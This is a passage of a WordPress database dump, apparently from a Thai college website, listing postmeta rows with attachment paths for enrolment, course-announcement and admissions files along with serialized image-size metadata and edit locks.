(30561, 12709, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/1-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"1-1-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-1-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-1-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-1-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30562, 12710, '_wp_attached_file', '2021/12/2.png'),
(30563, 12710, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:13:\"2021/12/2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"2-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"2-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30564, 12711, '_wp_attached_file', '2021/12/3.png'),
(30565, 12711, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:13:\"2021/12/3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"3-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"3-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"3-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"3-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30566, 12712, '_wp_attached_file', '2021/12/4.png'),
(30567, 12712, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:13:\"2021/12/4.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"4-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"4-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"4-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"4-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30568, 12716, '_edit_lock', '1647273516:14'),
(30569, 12716, '_edit_last', '14'),
(30570, 12717, '_wp_attached_file', '2022/03/ตัวอย่างเอกสารมอบตัว.pdf'),
(30573, 12716, '_hide_featured', NULL),
(30576, 12720, '_edit_lock', '1647273694:14'),
(30577, 12720, '_edit_last', '14'),
(30578, 12721, '_wp_attached_file', '2022/03/เอกสารการมอบตัวนักเรียน-นักศึกษา-ปกติ-ปีก.pdf'),
(30581, 12720, '_hide_featured', NULL),
(30584, 12725, '_edit_lock', '1647586998:14'),
(30585, 12725, '_edit_last', '14'),
(30586, 12725, '_hide_featured', NULL),
(30587, 12730, '_edit_lock', '1647318775:1'),
(30588, 12730, '_edit_last', '1'),
(30595, 12734, '_wp_attached_file', '2021/12/FB_IMG_1647317915849.jpg'),
(30596, 12734, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:32:\"2021/12/FB_IMG_1647317915849.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1647317915849-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1647317915849-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1647317915849-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1647317915849-358x300.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30597, 12736, '_edit_lock', '1647318440:14'),
(30598, 12736, '_edit_last', '14'),
(30601, 12736, '_hide_featured', NULL),
(30608, 12730, '_hide_featured', NULL),
(30609, 12744, '_wp_attached_file', '2021/12/รายชื่อผู้ผ่านการคัดเลือก-2565-01.png'),
(30610, 12744, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1213;s:6:\"height\";i:342;s:4:\"file\";s:95:\"2021/12/รายชื่อผู้ผ่านการคัดเลือก-2565-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:95:\"รายชื่อผู้ผ่านการคัดเลือก-2565-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:94:\"รายชื่อผู้ผ่านการคัดเลือก-2565-01-300x85.png\";s:5:\"width\";i:300;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:95:\"รายชื่อผู้ผ่านการคัดเลือก-2565-01-768x217.png\";s:5:\"width\";i:768;s:6:\"height\";i:217;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:96:\"รายชื่อผู้ผ่านการคัดเลือก-2565-01-1024x289.png\";s:5:\"width\";i:1024;s:6:\"height\";i:289;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:95:\"รายชื่อผู้ผ่านการคัดเลือก-2565-01-400x113.png\";s:5:\"width\";i:400;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30611, 12749, '_edit_lock', '1647794158:12'),
(30612, 12749, '_edit_last', '12'),
(30615, 12749, '_hide_featured', NULL),
(30622, 12756, '_edit_lock', '1647349525:14'),
(30623, 12756, '_edit_last', '14'),
(30624, 12757, '_wp_attached_file', '2022/03/20220308145659247-1.pdf'),
(30627, 12756, '_hide_featured', NULL),
(30632, 12759, '_wp_attached_file', '2021/12/1-2.png'),
(30633, 12759, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/1-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"1-2-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-2-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-2-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-2-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30634, 12760, '_wp_attached_file', '2021/12/2-1.png'),
(30635, 12760, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/2-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"2-1-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-1-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-1-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-1-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30636, 12761, '_wp_attached_file', '2021/12/4-1.png'),
(30637, 12761, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:709;s:4:\"file\";s:15:\"2021/12/4-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"4-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"4-1-300x86.png\";s:5:\"width\";i:300;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"4-1-768x220.png\";s:5:\"width\";i:768;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"4-1-1024x293.png\";s:5:\"width\";i:1024;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"4-1-400x114.png\";s:5:\"width\";i:400;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30645, 12773, '_edit_lock', '1648023944:14'),
(30646, 12773, '_edit_last', '14'),
(30647, 12774, '_wp_attached_file', '2022/03/ประกาศรายวิชาซัมเมอร์รอบสอง.pdf'),
(30650, 12773, '_hide_featured', NULL),
(30653, 12778, '_wp_attached_file', '2021/12/277568720_4348654251904560_8202488676588500371_n.jpg'),
(30654, 12778, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:60:\"2021/12/277568720_4348654251904560_8202488676588500371_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"277568720_4348654251904560_8202488676588500371_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"277568720_4348654251904560_8202488676588500371_n-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"277568720_4348654251904560_8202488676588500371_n-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"277568720_4348654251904560_8202488676588500371_n-358x300.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30655, 12780, '_edit_lock', '1648785183:14'),
(30656, 12780, '_edit_last', '14'),
(30659, 12780, '_hide_featured', NULL),
(30664, 12782, '_wp_attached_file', '2021/12/277568720_4348654251904560_8202488676588500371_n-1.jpg'),
(30665, 12782, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:62:\"2021/12/277568720_4348654251904560_8202488676588500371_n-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"277568720_4348654251904560_8202488676588500371_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"277568720_4348654251904560_8202488676588500371_n-1-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:62:\"277568720_4348654251904560_8202488676588500371_n-1-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"277568720_4348654251904560_8202488676588500371_n-1-358x300.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30666, 12786, '_edit_lock', '1648808966:14'),
(30667, 12786, '_edit_last', '14'),
(30668, 12787, '_wp_attached_file', '2022/04/แบบตอบรับ-กำหนดการ-2564.pdf'),
(30669, 12788, '_wp_attached_file', '2022/04/ตัวอย่าง.pdf'),
(30670, 12789, '_edit_lock', '1649153787:14'),
(30671, 12789, '_edit_last', '14'),
(30674, 12789, '_hide_featured', NULL),
(30679, 12791, '_wp_attached_file', '2021/12/Untitled-1-3.jpg'),
(30680, 12791, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:1181;s:4:\"file\";s:24:\"2021/12/Untitled-1-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-1-3-300x143.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-3-768x366.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-1-3-1024x488.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-3-400x190.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30681, 12794, '_edit_lock', '1649129636:14'),
(30682, 12794, '_edit_last', '14'),
(30683, 12795, '_wp_attached_file', '2022/04/ขึ้นทะเบียนเป็นนักเรียน-นักศึกษา-รอบสอบ-ประจำปีการศึกษา-2565.pdf'),
(30686, 12794, '_hide_featured', NULL),
(30691, 12797, '_wp_attached_file', '2021/12/20220405_104348_0000.png'),
(30692, 12797, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:6912;s:6:\"height\";i:2304;s:4:\"file\";s:32:\"2021/12/20220405_104348_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220405_104348_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220405_104348_0000-300x100.png\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"20220405_104348_0000-768x256.png\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"20220405_104348_0000-1024x341.png\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220405_104348_0000-400x133.png\";s:5:\"width\";i:400;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30693, 12215, '_cg_img_link', '/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0-3/'),
(30694, 12215, '_cg_link_target', ''),
(30695, 12800, '_wp_attached_file', '2022/04/กำหนดการ.pdf'),
(30696, 12802, '_wp_attached_file', '2022/04/แบบตอบรับ-กำหนดการ-2564-1.pdf'),
(30703, 12804, '_wp_attached_file', '2022/04/กำหนดการรับใบประกาศนียบัตร.pdf'),
(30708, 12806, '_wp_attached_file', '2021/12/คุณธนิต.jpg'),
(30709, 12806, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:1181;s:4:\"file\";s:33:\"2021/12/คุณธนิต.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"คุณธนิต-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"คุณธนิต-300x143.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"คุณธนิต-768x366.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"คุณธนิต-1024x488.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:33:\"คุณธนิต-400x190.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30710, 12808, '_wp_attached_file', '2021/12/คุณธนิต-1.jpg'),
(30711, 12808, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:1181;s:4:\"file\";s:35:\"2021/12/คุณธนิต-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"คุณธนิต-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"คุณธนิต-1-300x143.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"คุณธนิต-1-768x366.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"คุณธนิต-1-1024x488.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"คุณธนิต-1-400x190.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30712, 12812, '_edit_lock', '1649730821:12'),
(30713, 12812, '_edit_last', '12'),
(30714, 12813, '_wp_attached_file', '2022/04/ชย.jpg'),
